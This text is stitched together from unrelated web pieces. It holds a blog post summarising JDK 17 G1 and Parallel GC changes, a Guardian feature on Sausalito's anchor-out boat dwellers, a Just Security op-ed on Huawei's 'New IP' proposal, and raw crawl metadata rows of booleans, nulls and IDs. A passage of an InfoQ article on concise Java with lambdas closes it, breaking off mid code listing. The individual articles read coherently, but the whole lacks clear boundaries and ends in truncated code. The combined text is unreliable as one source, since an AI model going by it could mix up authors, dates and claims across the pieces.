URL: https://tschatzl.github.io/2021/09/16/jdk17-g1-parallel-gc-changes.html
Title: JDK 17 G1/Parallel GC changes
Author: Tschatzl @ Github
# JDK 17 G1/Parallel GC changes

A few days ago JDK 17 went GA. For this reason it is time for another post that attempts to summarize the most significant changes in Hotspot's stop-the-world garbage collectors in that release: G1 and Parallel GC.

Before getting into detail about what changed in G1 and Parallel GC, a short overview with statistics about the whole GC subcomponent: there has been no JEP in the garbage collection area. The full list of changes for the entire Hotspot GC subcomponent is here, clocking in at 312 changes in total. This is in line with recent releases.

Before talking about the stop-the-world collectors, a brief look over at ZGC: this release improved usability by dynamically adjusting the number of concurrent GC threads to match the application, on the one hand to optimize throughput and on the other to avoid allocation stalls (JDK-8268372). Another notable change, JDK-8260267, reduces mark stack memory usage significantly. Per is likely going to share more details on his blog soon.

## Generic improvements

- The VM can now use different large page sizes for different memory reservations since JDK-8256155: i.e. the code cache may use differently sized large pages than the Java heap and other large reservations. This allows better use of the large pages configured in the system. My colleague Stefan has a write-up on why and how to use large pages here.

## Parallel GC

Parallel GC pauses have been sped up a bit by executing in parallel phases of the pauses that were formerly serial. This includes:

- JDK-8204686, which implements **dynamic parallel reference processing** like G1 has done for some time now. Previous work in the last few releases allowed easy implementation of this feature.
  It works just like the G1 implementation: based on the number of `java.lang.ref.Reference` instances that need reference processing for a given type (Soft, Weak, Final and Phantom) during a given garbage collection, Parallel GC now starts different numbers of threads for a particular phase of reference processing. Roughly, the implementation divides the observed number of `j.l.ref.Reference`s for a given phase by the value of `ReferencesPerThread` (default `1000`) to determine the number of threads Parallel GC is going to use for that particular phase. The option `ParallelRefProcEnabled` is enabled by default now, enabling this mechanism. Since the introduction of this feature in G1 in JDK 11 we have not heard complaints, so this seems appropriate. Please also check the Release Notes.
- Similarly, processing of **all internal weak references** has been changed to automatically exploit parallelism in JDK-8268443.
- Finally, JDK-8248314 shaves **a few milliseconds off Full GC pauses** for the same reason.

We also noticed small single-digit percent improvements in throughput in some applications compared to JDK 16, which are, however, more likely related to compiler improvements in JDK 17 than to GC ones. That is, unless the above changes exactly solve your application's issue.

## G1 GC

- G1 now schedules **preventive garbage collections** with JDK-8257774. This contribution by Microsoft introduces a special kind of young collection whose purpose is to avoid the typically long pauses caused by evacuation failures.
  This situation, where there is not enough space to copy objects to, often occurs because of a high rate of short-lived humongous object allocation: such objects may fill up the heap before G1 would normally schedule a garbage collection. So instead of waiting for this situation to happen, G1 starts an out-of-schedule garbage collection while it can still be confident that there is enough space to copy surviving objects to, assuming that eager reclaim will free up lots of heap space and regular operation can continue. Preventive collections are tagged as `G1 Preventive Collection` in the logs, i.e. the corresponding log entries could look like the following:

  ```
  [2.574s][info][gc] GC(121) Pause Young (Normal) (G1 Evacuation Pause) 86M->83M(90M) 5.781ms
  [2.582s][info][gc] GC(122) Pause Young (Normal) (G1 Evacuation Pause) 86M->83M(90M) 4.936ms
  [2.596s][info][gc] GC(123) Pause Young (Normal) (G1 Preventive Collection) 86M->84M(90M) 9.997ms
  ```

  Preventive garbage collections are enabled by default. They may be disabled using the diagnostic flag `G1UsePreventiveGC` in case they cause regressions.
- A significant bug with **large page handling on Windows has been fixed**: JDK-8266489 enables G1 to use large pages when the region size is larger than 2 MB, increasing performance significantly in some cases on larger Java heaps.
- With JDK-8262068, Hamlin Li **added support for the `MarkSweepDeadRatio` option** in G1 Full GC, in addition to Serial and Parallel GC. This option controls how much waste is tolerated in regions scheduled for compaction: regions with a higher live occupancy than this ratio (default 95%) are not compacted, because compacting them would not return an appreciable amount of memory yet would take a long time. In some situations this may be undesirable. If you want maximum heap compaction for some reason, manually setting this flag's value to `100` disables the feature (as with the other collectors).
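As a minimal sketch of how the two switches mentioned above could be set on the command line (the application class `MyApp` is a placeholder; note that `G1UsePreventiveGC` is a diagnostic flag and must be unlocked first):

```shell
# Turn preventive collections off if they cause regressions (diagnostic flag)
java -XX:+UseG1GC -XX:+UnlockDiagnosticVMOptions -XX:-G1UsePreventiveGC MyApp

# Ask G1 Full GC for maximum compaction: also compact regions that are almost fully live
java -XX:+UseG1GC -XX:MarkSweepDeadRatio=100 MyApp
```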
- Significant memory savings may be gained by **pruning collection sets early** (JDK-8262185): with that change, G1 keeps remembered sets only for the range of old generation regions that it will almost surely evacuate, not for all potentially useful candidates. There is a posting on my blog that highlights the problem and shows potential gains.

Some additional parallelization of parts of the GC phases (e.g. JDK-8214237) may result in overall improved performance, as e.g. reported here.

## Other Noteworthy Changes

In addition, there are JDK 17 changes that are important but less visible, or not visible at all, to end users.

- We started to **aggressively refactor the G1 collector code**. In particular, we are in the process of moving code out of the catch-all class `G1CollectedHeap`, trying to separate concerns and slice it into more understandable components. This already improves maintainability and hopefully speeds up further work.

## What's next

Of course the GC team and other contributors are already actively working on JDK 18. Here is a short list of interesting changes that are currently in development and that you may want to look out for. Without guarantees, as usual; they are going to be integrated when they are done ;-)

- First, the actually **already integrated** change JDK-8017163 **massively reduces G1 memory consumption at no cost**. This rewrite of remembered set data storage reduces its footprint by around 75% from JDK 17 to JDK 18. As a teaser, the following figure shows memory consumption as reported by NMT for the GC component of some database-like application on various recent JDKs. Particularly note the yellow line showing current (18b11) total memory usage compared to 17b35 (pink) and 16.0.2 (blue). You can calculate remembered set size by subtracting the other GC component memory usage, represented by the "floor" (cyan), from a given curve. There will be a **more thorough evaluation** and explanation of the change in the **future in this blog**.
  At least, remembered set size tuning should to a large degree be a thing of the past. More changes building on this one to improve performance and further reduce remembered set memory size are planned.
- **Serial GC, Parallel GC and ZGC support string deduplication** like G1 and Shenandoah in JDK 18. JEP 192 gives details about this technique, now applicable to all Hotspot collectors.
- **Support for archived heap objects for Serial GC** is in development in JDK-8273508.
- Hamlin Li is currently doing great work on **improving evacuation failure handling**, with the apparent **goal of enabling region pinning in G1** in the future; I wrote a short post on the problems and possible approaches earlier.

More to come :)

## Thanks go to…

Everyone that contributed to another great JDK release. See you in the next release :)

*Thomas*
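For reference, per-subsystem memory numbers like the NMT figures discussed above can be gathered with stock JDK tooling; a minimal sketch (the application class `MyApp` and the process id `<pid>` are placeholders):

```shell
# Start the JVM with native memory tracking enabled
java -XX:NativeMemoryTracking=summary MyApp

# In another terminal, print a per-subsystem breakdown, including the GC component
jcmd <pid> VM.native_memory summary
```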
File date: 2024-10-12
Date: 2021-09-16
---
URL: https://www.theguardian.com/us-news/2021/oct/31/anchor-outs-sausalito-california-richardson-bay
Title: The anchor-outs: San Francisco’s bohemian boat dwellers fight for their way of life
Author: Erin McCormick
For decades, a group known as the “anchor-outs” enjoyed a relatively peaceful existence in a corner of the San Francisco Bay. The mariners carved out an affordable, bohemian community on the water, in a county where the median home price recently hit $1.8m. But their haven could be coming to an end – and with it, a rapidly disappearing way of life.

The anchor-outs live aboard semi-derelict boats abutting the town of Sausalito, an upscale enclave just north of the Golden Gate Bridge in Marin county where mansions boast floor-to-ceiling windows overlooking the water. Tourists arrive by ferry from the city on weekends, strolling the promenade of restaurants, wine bars, art galleries and boutiques.

The agency that oversees the local waterway known as the Richardson Bay has in recent months begun a fervent crackdown on the boat dwellers, who they say are here illegally and pose a threat to safety and the marine environment. Determined to clear the waters, a hardline harbormaster has even begun confiscating and destroying boats that overstay their welcome. The anchor-outs, meanwhile, are fighting back, staging protests and clashing with authorities who they say are in effect rendering them homeless.

On a recent afternoon, the sounds of a tractor’s hydraulic arm crushing a fiberglass sailboat carried on the wind. The noise lingered over a homeless encampment that has grown near the waterfront. “Camp Cormorant”, as boaters nicknamed it, has become the political base of the anchor-outs’ protest movement. For the 50 or so people camped in neat rows of tents, the frequent whir, crunch and crack of the crusher represents their way of life being torn to bits. Many say they were forced to decamp here after their vessels were destroyed.
“They want to take our homes and shut the anchorage down,” says Jeff Jacob Chase, a 20-year anchor-out with a trademark pirate swagger, a long, salt-and-pepper beard, spectacles and floppy hat. “They basically want to eradicate a culture.”

In a region dominated by water, boats have been used as a cheap source of housing since the Gold Rush, when miners lived aboard vessels. In the 1950s, a community of bohemians and artists grew along the Sausalito shoreline, with residents building wildly creative floating constructions that offered shelter and inspiration to Beat writers and artists such as Allen Ginsberg and Shel Silverstein. It transformed into a hippy music scene in the 1960s, but in the mid-1970s, residents of those houseboats were mostly pushed out in a series of local enforcement actions known as “the houseboat wars”.

Despite its beatnik origins, today the Richardson Bay hosts a unique waterfront class system. At the top are the authorized houseboat marinas where floating, luxury homes with shingle siding, plumbing and electricity can sell for more than $1m. Other boaters, known as live-aboards, can pay a monthly fee to dwell on their sailboats and cabin cruisers in a marina slip, but the number of spots is tightly controlled and authorities say there is a long waiting list. Finally there are the anchor-outs, whom some see as the last of a dying breed of free spirits who eschew the world of rent deposits, credit checks and bills.

The anchor-outs get by with minimal resources, hauling their own water and generating power from tiny solar panels. They brave the bay’s famous winds to travel to and from the shore in rowboats or motorized dinghies. Housing advocates say the battle over their way of life is just the latest chapter in a crisis that has seen living options for low-income residents all but vanish.
Chase still has his sailboat, a sloop named the Jubilee, but he also spends time in Camp Cormorant, organizing his fellow boaters to protest against the evictions as an officer of the local chapter of the California Homeless Union. “What they’re doing is criminalizing this entire community,” said Chase.

## Waterfront patrols and crushed boats

Curtis Havel, the harbormaster, would be the first to call himself the villain of this story. It’s a breezy Wednesday morning and Havel is out patrolling the waters. He stands on the bow of his aluminum patrol boat and gestures at the spectacular scenery around him. “For a long time, people regarded Richardson’s Bay as this sort of bohemian live-and-let-live situation and the vessel count continued to increase,” he says. “Now it’s time for us to enforce our rules.”

The state agency that oversees the San Francisco Bay had been building pressure on local authorities to act, and Havel says clearing the harbor of illegal anchoring was the primary mission he was given when he was hired two years ago. Citing a long-unenforced rule that says boats can anchor for no more than 72 hours, Havel has been confiscating boats, dragging them into a shipyard and crushing them into chunks. Of the 190 boats out here when he took over, Havel says he has gotten rid of all but 86 vessels – about 70 of which are now occupied by full-time residents.

Havel argues boats and their occupants can cause a laundry list of problems and environmental concerns. Their anchors drag along the bottom and destroy the eelgrass, an important habitat for marine life. Boats break loose from their anchors during storms, endangering those aboard and others along the shore. The residents dump sewage and leave abandoned boats and parts polluting the bay. And there have been complaints about drug use and crime. Havel says his enforcement has made him unpopular, but he’s willing to take some flak in order to get the job done.
His patrol boat edges up to the side of a rusting, metal-hulled craft, piled with plywood and corrugated metal, which appears to have become home to a flock of seagulls. Havel had already plastered a note on the side of the boat, warning that it would be disposed of if not removed within 10 days. “I hate to even call this a boat; at this point it’s just a shell,” he says, adding that he hasn’t seen occupants aboard the vessel for several months. “That’s a dead boat you’re looking at.”

Havel recently announced plans to leave his role at the end of the month, and while his agency appears undeterred in its mission, he says they are trying to find long-term solutions. The state has agreed to extend the timeline for clearing the bay by a few years, and for those still living aboard, Havel says, the county plans to send outreach workers to help find other housing.

But around the anchorage, signs of rebellion abound. Some boats fly upside-down American flags, the maritime signal for distress. Occupants of a boat named Evolution have taped up a big, hand-stenciled “R”, rebranding it the “REvolution”. As Havel patrols, a metal dinghy motors up behind him. The driver, a boat-dweller with a white megaphone, starts shouting at Havel, peppering his taunts with expletives. “Tell them how you’ve been crushing people’s homes, sir,” yells the man. Havel, however, appears unflustered. “It’s always been politically charged; it’s just getting heightened because we’re doing something.”

## ‘I’m not homeless, I’m houseless’

Authorities say they have been seizing only abandoned and derelict boats, but around Camp Cormorant, numerous residents claim to have lost their homes to the crusher. Michael Adams and his wife lived in the anchorage for decades, raising two kids. The couple had recently become afraid to leave their boat, a historic 1928 pleasure cruiser named the Marlin, for fear it would get destroyed.
“I went off one morning and he crushed it,” says Adams as he paints a mural on the plywood patio he built in front of the tent he and his wife now call home. Robyn Kelly, a former skincare technician, moved into the anchorage after giving up her apartment and job to care for her sick mother, and ended up living on a 28ft power boat for a decade. She says it made an excellent home, until one day in 2019 she found it had been confiscated by the harbormaster. “I went away for 24 hours and I came back and it was gone,” said Kelly, who has since filed a lawsuit against the authorities for destroying her boat and possessions. Kelly and her two pups, Hank and Nacho, are currently staying on a friend’s boat; she’d like to move back to shore but her small income isn’t enough to make the deposit for an apartment, and her arthritis is starting to give her trouble. “I couldn’t afford an apartment now,” she said. “I’d love one.” Kelly’s friend, Billy McClean, is a fourth-generation Marin county resident. He can look across the water from where his Dutch cruiser is anchored and see stately houses constructed nearly a century ago by his grandfather, a local builder. He recalls growing up seeing people living freely on the water. “When I was a teenager I used to come down here to the boats and buy pot from what I called ‘the hippies’,” he says. “Now I live here.” McClean says people like him have been priced out of the region by an influx of tech workers making six-figure salaries. McClean couldn’t afford a decent apartment at his previous job working for a fencing company – so he bought a cheap motorboat and moved into the anchorage in 2009. His vessel has a TV, DVD player and a small refrigerator, all powered by a generator. He doesn’t have much space inside, but from his white decks he can see green waters and California hillsides all around him. “It’s nice out here – and then it’s not,” he said. 
“It’s a lot of work – and in the winter, it can be downright life threatening.”

A short skiff ride across the anchorage from McClean, Brian Doris is fixing up an old pleasure yacht named Marlia that he bought for $1 after it was abandoned. The outside of his boat is still cluttered with toolboxes and boat repair supplies, but he’s transformed the interior with sumptuous Turkish rugs and plants. “I’m not homeless, I’m houseless,” says Doris, who says he can no longer sleep on land because he misses the rocking of the waves. Like many anchorage residents, Doris scoffs at the idea of being placed into shelter housing. “This is my home,” he says, adding if they want to take his boat, they should “bring a body bag”.

## The last of a dying breed

Jennifer Friedenbach, the executive director of the San Francisco-based Coalition on Homelessness, says living on a boat was one of many “very-low-income housing options” that used to exist in California along with residential hotels and live-work spaces in warehouses. But these types of marginal housing have vanished. “Once gentrification came, those options disappeared, and that puts pressure on homelessness,” says Friedenbach.

Timothy Logan, a boat owner descended from three generations of California travelers, bought his houseboat cruiser the SS Patio nine years ago to serve as his primary residence. But since then, he has been kicked out of one harbor after another. He started as a resident of a marina in Sacramento, living along river waters that feed into the San Francisco Bay. That marina closed for development, so he moved his boat to other harbors, including ones in Antioch and Oakland, only to see boaters kicked out of those places too. “Out of the blue, the whole state of California was like: ‘You can’t live on the water,’” he says.

While the SS Patio is still anchored out in Richardson Bay, Logan fears his boat will eventually end up being crushed like many of his friends’.
Havel, the harbormaster, and authorities governing both Richardson Bay and the state of California say they are determined that within five years, the last of the anchor-outs will be gone. For their part, the anchor-outs don’t intend to go quietly. “We are a community; we’re trying to stick together,” says Logan.
Description: Since the 1950s, Marin county waters have been home to a community of mariners. Now local authorities say they have to leave
Date: 2021-10-31
Source: The Guardian
---
URL: https://www.justsecurity.org/75741/chinas-dystopian-new-ip-plan-shows-need-for-renewed-us-commitment-to-internet-governance/
Title: China’s Dystopian “New IP” Plan Shows Need for Renewed US Commitment to Internet Governance
Author: Mark Montgomery; Theo Lebryk
China released its 14th Five-Year plan for economic development last month, including its intended next steps in technology. The blueprint makes clear that, even before the ink is dry on many 5G contracts for broadband telecommunications, China and its networking giant Huawei are gearing up to ensure their vision of the internet goes global. But Huawei’s plans for 6G and beyond make U.S. concerns over 5G look paltry: Huawei is proposing a fundamental internet redesign, which it calls “New IP,” designed to build “intrinsic security” into the web. Intrinsic security means that individuals must register to use the internet, and authorities can shut off an individual user’s internet access at any time. In short, Huawei is looking to integrate China’s “social credit,” surveillance, and censorship regimes into the internet’s architecture.

The New IP proposal itself rests on a flawed technical foundation that threatens to fragment the internet into a mess of less interoperable, less stable, and even less secure networks. To avoid scrutiny of New IP’s shortcomings, Huawei has circumvented international standards bodies where experts might challenge the technical shortcomings of the proposal. Instead, Huawei has worked through the United Nations’ International Telecommunication Union (ITU), where Beijing holds more political sway.

The appropriate place for a review of the New IP concept would be the Internet Engineering Task Force (IETF). The IETF and other standards bodies are examining most of the technical changes to internet infrastructure that make up the New IP proposal, and these bodies have said it is premature to make a dramatic change without more information and consensus.
Huawei’s plan to rebuild the internet from the top down based on speculative use cases – uses of the internet that *might* one day exist, as opposed to an established use that current users or businesses are already clamoring for – bucks the logic of internet governance, which postulates that change should be incremental and based on established needs.

**Authoritarian Blocs**

Huawei’s and the Chinese Communist Party’s (CCP’s) turn to the ITU is no surprise, even though the ITU’s jurisdiction does not include internet architecture. When it comes to internet governance, the CCP and other authoritarian regimes have long favored *multilateral* international institutions like the ITU over *multistakeholder* international institutions such as the IETF or the Internet Corporation for Assigned Names and Numbers (ICANN). Multistakeholder institutions are governed by a diverse array of representatives from industry, civil society, and government; multilateral institutions only provide voting power to national governments.

In multistakeholder fora, civil society and industry representatives tend to favor a free and open internet, which dilutes the influence of national governments, many of whom are likely to favor a tightly regulated, censorable internet. Authoritarian governments can marginalize private industry and citizens’ groups by working through multilateral fora such as the ITU, meaning the U.N. and the ITU will naturally be more receptive to proposals like New IP that grant national governments more control over the internet. In 2019, China and Russia leveraged a similar authoritarian bloc within the U.N. to pass a censorship-friendly cybercrime resolution. A comparable coalition of likeminded countries could help China push through the New IP proposal, shortcomings and all.
Circumventing conventional internet-governance institutions in favor of the ITU also sets a precedent for future internet governance-related proposals to go through the ITU instead of more balanced multistakeholder institutions. What’s more, China has held the top position in the ITU for the last seven years. During his tenure as secretary-general of the ITU, Houlin Zhao of China has encouraged the expansion of the ITU’s mandate from just a telecommunications agency to a “technology agency” by working on technology unrelated to telecommunications such as internet architecture, the internet of things (IoT), and artificial intelligence (AI).

**Organizing the U.S. Government for Success**

Because of limitations due to the COVID-19 pandemic, the ITU’s World Telecommunication Standardization Assembly (WTSA-20), where New IP will be formally debated, has been delayed until February 2022. Therefore, Washington has time to prepare for, and confront, the first major referendum on New IP, even if it is in a less desirable standards forum.

In its March 2020 report, the U.S. Cyberspace Solarium Commission (CSC) highlighted another issue: the disparity between how the U.S. government engages at international fora like the ITU and the effort China is willing to make. In fact, New IP resulted in part from a previous U.S. abdication of presence and leadership, as the initial inquiry into the need for this new technology emerged out of a Huawei-dominated ITU focus group that lacked American input. This asymmetry in representation extends beyond that particular focus group. In the runup to the WTSA-20, China nominated representatives for management positions in virtually every ITU study group. Even when Chinese firms do not win leadership positions, China sends droves of meticulously prepared, synchronized delegations to push standards beneficial to Beijing and its national champions. By contrast, U.S. representatives appear to be prepared in an ad-hoc manner.
The United States is officially competing for one-fourth the number of chairmanships or vice chairmanships as China at WTSA-20. In past meetings, the United States has endeavored to keep the ITU focused on its appropriate areas of expertise (telecommunications) and away from intervening on other issues (the internet, artificial intelligence, blockchain, etc.) better suited to other standards bodies. The United States is correct to oppose ITU mission creep on principle. However, simply voicing principled opposition is not by itself enough to contain Chinese efforts to push ITU mission creep. The CSC recommended that the United States make a concerted effort to compete with China on internet governance, and articulated that this effort will require (1) getting the U.S. government organized for success, (2) building effective public and private buy-in, and (3) working with like-minded international allies and partners.

**Organized to Compete in International Fora**

The first step is to get the U.S. government organized and resourced to compete with China in these fora. This requires the National Institute of Standards and Technology (NIST) at the Department of Commerce, as well as the State Department and sector-specific agencies, to work together to develop a strategic approach to dealing with issues like New IP at international fora. This will require increased funding for NIST. The establishment of a State Department Bureau for Cyberspace Policy, as laid out in the Cyber Diplomacy Act of 2021, would provide much of the organizational reform required. However, the State Department will require increased funding and focus to coordinate action and address the challenge of declining U.S. influence in internet governance and international digital standards.

A good first objective should be electing an ITU secretary-general who will respect the limitations of the ITU’s mandate and who is less amenable to government control over the internet. A U.S. representative, Doreen Bogdan-Martin, is running for the position in 2022. Even if Bogdan-Martin does not win the election, the United States should work to ensure the eventual winner will discontinue Zhao’s policy of ITU mission creep into areas such as New IP. The worst-case scenario would be for Russia’s candidate, Rashid Ismailov, to win the secretary-generalship. Ismailov leads a delegation that routinely attempts to enhance the ITU’s power over internet governance at the expense of multistakeholder institutions. Ismailov is personally on record advocating for “providing governments and non-profit organizations with an opportunity to control activities” of ICANN, one of the most important multistakeholder bodies in internet governance. Ensuring Ismailov or a like-minded candidate does not win should be a top priority for the United States.

The second step toward ensuring the United States can compete effectively with China on internet governance is determining the optimal mix of incentives and prodding to get American firms to more actively represent U.S. interests. Historically, when the United States leaves engagement in international fora up to its private enterprises alone, American firms’ main incentive for participating becomes direct self-interest. U.S. firms see limited incentives to make long-term commitments to slower-moving international fora such as the ITU’s standardization arm, the ITU-T. To put it another way, no firm wants to waste its resources playing defense against abstract, long-term threats such as Huawei’s plan to reinvent the internet. By contrast, Chinese firms receive financial incentives from the government to craft international standards and are publicly pressured into acting as a united front in these bodies.
This hands-off approach to public-private collaboration on the part of the United States is insufficient when it comes to international standard setting, and is in part what allowed Huawei to assert influence in standards bodies such as the ITU-T and 3GPP in recent years. U.S. government and industry must work together on the vast majority of issues where the two can agree and thus counter Chinese efforts.

Third, the United States needs to build coalitions of likeminded countries in internet-governance institutions. Strengthening ties and coordinating action with traditional allies is critical but insufficient. The United States also needs to find common ground with non-traditional partners that may not share U.S. values of an open internet but are also skeptical of a Chinese-led order. The 2019 Sino-Russian cybercrime resolution, which initiated the drafting process for a treaty that would enable governments to clamp down on free speech on the internet, passed in part because 34 countries abstained. Convincing countries like Mexico, Brazil, and the Philippines to oppose China’s power plays will be key to preventing initiatives like New IP from taking hold.

The United States cannot afford a similar failure to compete, as was the case in international fora associated with 5G development and international cybercrime. Chinese dominance in standardization will cost American firms market share and can open the door for more Chinese backdoors around the globe. Huawei dominance on New IP and 6G would not only create a less free, less interoperable internet, it would pave the way for authoritarian governments to gain expanded say over future changes to the internet for years to come. The Chinese New IP proposal can be successfully contested, but only if the United States rallies its private-industry partners and like-minded international democratic governments to the cause.
They must all work together to collectively rein in the threat of authoritarian governments using multilateral institutions such as the ITU to export their vision of the internet worldwide before it is too late.
true
true
true
The US must rally partners to rein in the abuse of multilateral institutions for Huawei’s plans on 6G and beyond, which make concerns over 5G look minor.
2024-10-12 00:00:00
2021-04-13 00:00:00
https://i0.wp.com/www.ju…1024%2C681&ssl=1
article
justsecurity.org
Just Security
null
null
1,652,064
http://digitizor.com/2010/09/01/ksplice-uptrack-is-now-free-in-fedora/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
9,451,048
http://www.infoq.com/articles/Concise-Java
Concise Java
Casimir Saternos
Computer scientists emphasize the value of conciseness of expression in problem solving. Unix pioneer Ken Thompson once famously stated, “One of my most productive days was throwing away 1000 lines of code.” This is a worthy goal on any software project requiring ongoing support and maintenance, yet can be lost by a focus on software development metrics like lines-of-code. Early Lisp contributor Paul Graham went as far as to equate succinctness in a programming language with its power. This notion of power has made the ability to write compact, simple code a primary criterion for language selection in many modern software projects. Any program can be made shorter by refactoring it to remove superfluous code or extraneous filler like whitespace, but certain languages are inherently expressive and particularly well suited for writing short programs. With this quality in mind, Perl programmers popularized code golf competitions; the goal being to use the shortest amount of code possible to solve a particular problem or implement a specific algorithm. The APL language was designed to use special graphical symbols that allowed programmers to write powerful programs with tiny amounts of code. Such programs, when properly implemented, map well to standard mathematical representations. Terse languages can be very effective for quickly creating small scripts, particularly when used in clearly delineated problem domains where their brevity does not obscure their purpose. Java has a reputation for being verbose relative to other programming languages. This is partially due to established practices in the programming community, which in many instances allow for a greater degree of descriptiveness and control when performing a task. For example, long variable names can make a large codebase more readable and maintainable over the long term. 
Descriptive class names generally map to file names, which immediately clarify where new functionality should be added to an existing system. When used consistently, descriptive names can greatly simplify searching for text indicating a particular functionality within an application. These practices have contributed to Java’s great success in large-scale implementations with large, complex code bases. Conciseness is preferred in smaller projects, and some languages are well-suited for writing short scripts or for interactive exploratory programming at a prompt. Java is extremely useful as a general-purpose language for writing cross-platform utilities. In such situations, the use of “verbose Java” doesn’t necessarily provide additional value. Although code style can be altered in areas such as the naming of variables, certain fundamental aspects of the Java language have historically required the use of more characters to accomplish a task than comparable code in other programming languages. In response to such limitations, the language has been updated over time to include features typically classified as “syntactic sugar.” These idioms allow the same functionality to be expressed with fewer characters. Such idioms are preferable to their more verbose counterparts and have generally been quickly adopted into common usage by the programming community. This article will highlight practices for writing concise Java code, with a special focus on the new functionality available in JDK 8. Shorter, more elegant code is possible due to the inclusion of Lambda Expressions in the language. This is especially evident when processing collections using the new Java Streaming API. ## Verbose Java Java’s reputation for verbosity is partially due to its implementation style of object-orientation. The classic example of a “Hello World” program can be implemented in many languages in a single line of code containing less than 20 characters. 
In Java this requires a main method within a class definition which contains a method call to write the string using System.out.println(). At minimum, with only the requisite sprinkling of method qualifiers, brackets and semicolons the minimal “Hello World” program with all whitespace removed tops out at 86 characters. Coupled with spacing and a bit of indentation for readability, the “Hello World” program provides an inarguably wordy first impression. Java’s verbosity is partially due to community standards that opt for descriptiveness over brevity. It is trivial to opt for different standards related to code format aesthetics in this regard. In addition, methods and sections of boilerplate code can be wrapped in methods that can be incorporated into APIs. Refactoring a program with an eye towards brevity can greatly simplify it without sacrificing accuracy or clarity. Java’s reputation for verbosity is at times skewed by a plethora of old code examples. Many books have been written about Java over the years. Since Java has been around since the beginnings of the world wide web, many online resources provide snippets from the earliest versions of the language. But Java has matured over the years in response to perceived deficiencies, and so even accurate and well implemented examples might not take advantage of later language idioms and APIs. Java’s design goals specified that it be object-oriented, familiar (which at that time meant using C++ style syntax), robust, secure, portable, threaded and highly performant. Brevity was not a goal. Functional languages provide terse alternatives to comparable tasks implemented using an object-oriented syntax. Lambda Expressions added in Java 8 open the door to functional programming idioms which alter the appearance of Java and reduce the amount of code needed to perform many common tasks. ## Functional Programming Functional Programming makes the function the central construct for programmers. 
This allows functions to be used in a very flexible manner, such as passing them as arguments. Based on this capability, Java lambda expressions enable you to treat functionality as a method argument, or code as data. A lambda expression can be thought of as an unnamed method independent of any specific class association. There is a rich and fascinating mathematical basis for these ideas. Functional programming and lambda expressions can be perceived as abstract, esoteric concepts. For a programmer chiefly concerned with tackling a task in industry, there might not be an interest in catching up on the latest computational trends. With the introduction of lambdas into Java, however, it is necessary for developers to understand these new features at least to the degree that programs written by other developers can be understood. There are practical benefits that can affect the design of concurrent systems, resulting in better performance. And what is of immediate interest in this article is how these mechanisms can be used to craft short yet clear code.

There are several reasons lambda expressions produce code brevity. Fewer local variables are used, reducing the clutter required to declare and set them. Loops can be replaced with method calls, reducing three or more lines to a single line of code. Code traditionally expressed in nested loops and conditional statements can be expressed in a single method. Implemented as fluent interfaces, methods can be chained together in a manner analogous to Unix piping. The net effect of writing code in a functional style is not limited to readability. Such code can avoid maintaining state and be side-effect free, with the added benefit of being easily parallelized for more efficient processing.

### Lambda Expressions

The syntax related to lambda expressions is straightforward, but is unlike idioms seen in previous versions of Java. A lambda expression is made up of three parts: an argument list, an arrow, and a body.
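The three parts combine in a few common shapes. A brief sketch (the target types here are chosen only for illustration):

```java
import java.util.Comparator;
import java.util.function.Function;

// Empty argument list: parentheses are required
Runnable r = () -> System.out.println("Hi!");

// Single argument: parentheses may be omitted
Function<String, Integer> len = s -> s.length();

// Multiple arguments: parentheses are required
Comparator<String> byLength = (a, b) -> Integer.compare(a.length(), b.length());
```

In each case the compiler infers which functional interface the lambda implements from the declared type on the left.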
An argument list may or may not include parentheses. A related operator consisting of a double colon has also been added that can further reduce the amount of code required for certain lambda expressions. This is known as a method reference.

### Thread Creation

In this example, a Runnable is created and run. The lambda expression appears on the right side of the assignment operator and specifies an empty argument list, with the simple outcome of a message being written to standard out when the Runnable is run.

```java
Runnable r1 = () -> System.out.print("Hi!");
r1.run();
```

## Processing Collections

One of the primary places where the presence of lambdas will be noticed by many developers is in relation to the Collections API. Consider a list of Strings that we wish to sort by their length.

```java
java.util.List<String> l;
l = java.util.Arrays.asList(new String[]{"aaa", "b", "cccc", "DD"});
```

A lambda expression can be created to implement this functionality.

```java
java.util.Collections.sort(l, (s1, s2) -> new Integer(s1.length()).compareTo(s2.length()));
```

This example includes two arguments which are passed to the body of the lambda so that their lengths can be compared. There are several alternatives available to operate on each element in a list without resorting to standard "for" or "while" loops. Comparable semantics can be achieved by passing a lambda to the collection's "forEach" method. In that case, no parentheses are used with the single argument passed.

```java
l.forEach(s -> System.out.println(s));
```

This particular example can be further shortened using a method reference, in which the double colon separates the containing class or object from the method. Each element is passed to the println method in turn.

```java
l.forEach(System.out::println);
```

### The java.util.stream Package

The java.util.stream package is new to Java 8 and uses syntax familiar to functional programmers to process collections.
Its summary explains its contents as "Classes to support functional-style operations on streams of elements, such as map-reduce transformations on collections." The class diagram that follows provides an overview of the package with an emphasis on functionality that will be exercised in a subsequent example. The package structure lists a number of Builder classes. Such classes are common with fluent interfaces that allow methods to be chained together into a pipelined set of operations.

Although string parsing and collection manipulation is simple, it has many practical real-world applications. Sentences need to be segmented into separate words when doing Natural Language Processing (NLP). Bioinformatics represents macromolecules like DNA and RNA as nucleobases consisting of letters such as C, G, A, T, or U. In each problem domain, Strings are broken down and constituent parts are manipulated, filtered, counted and sorted. So although the example contains very simple use cases, the concepts are generalizable to a wide variety of meaningful tasks.

The example code parses a String containing a sentence and counts the number of words and letters of interest. The complete listing is just under 70 lines of code including whitespace.

```java
 1. import java.util.*;
 2.
 3. import static java.util.Arrays.asList;
 4. import static java.util.function.Function.identity;
 5. import static java.util.stream.Collectors.*;
 6.
 7. public class Main {
 8.
 9.     public static void p(String s) {
10.         System.out.println(s.replaceAll("[\\]\\[]", ""));
11.     }
12.
13.     private static List<String> uniq(List<String> letters) {
14.         return new ArrayList<String>(new HashSet<String>(letters));
15.     }
16.
17.     private static List<String> sort(List<String> letters) {
18.         return letters.stream().sorted().collect(toList());
19.     }
20.
21.     private static <T> Map<String, Long> uniqueCount(List<String> letters) {
22.         return letters.<String>stream().
23.             collect(groupingBy(identity(), counting()));
24.     }
25.
26.     private static String getWordsLongerThan(int length, List<String> words) {
27.         return String.join(" | ", words
28.             .stream().filter(w -> w.length() > length)
29.             .collect(toList())
30.         );
31.     }
32.
33.     private static String getWordLengthsLongerThan(int length, List<String> words)
34.     {
35.         return String.join(" | ", words
36.             .stream().filter(w -> w.length() > length)
37.             .mapToInt(String::length)
38.             .mapToObj(n -> String.format("%" + n + "s", n))
39.             .collect(toList()));
40.     }
41.
42.     public static void main(String[] args) {
43.
